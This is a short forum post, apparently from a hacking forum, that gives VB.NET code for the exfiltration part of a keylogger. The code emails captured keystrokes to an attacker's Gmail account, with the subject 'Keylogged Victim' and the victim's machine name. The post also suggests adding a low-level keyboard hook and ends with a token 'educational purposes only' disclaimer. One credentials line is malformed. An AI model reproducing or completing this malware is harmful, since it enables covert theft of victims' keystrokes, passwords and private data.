
Originally Posted by
PixieCorp
Getting peoples information

Unless it doesn't send info...
Solution:
Imports System.Net.Mail
Dim sz_id2 As String = Environment.MachineName
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(username)
MyMailMessage.To.Add(username)
ProgressBar1.Value = 80
MyMailMessage.Subject = "Keylogged Victim " + sz_id2
MyMailMessage.Body = textbox1.text
Dim SMPT As New SmtpClient("smtp.gmail.com")
SMPT.Port = 587
SMPT.EnableSsl = True
ProgressBar1.Value = 90
SMPT.Credentials = New userNAME, PASSWORD
SMPT.Send(MyMailMessage)
Encrypt your user & pass for safe sending.
EDUCATIONAL PURPOSES ONLY, DONT KEYLOGG PEOPLE
Add in a low level keyboard hook, and then you can make shift appear as whatever you want, or etc.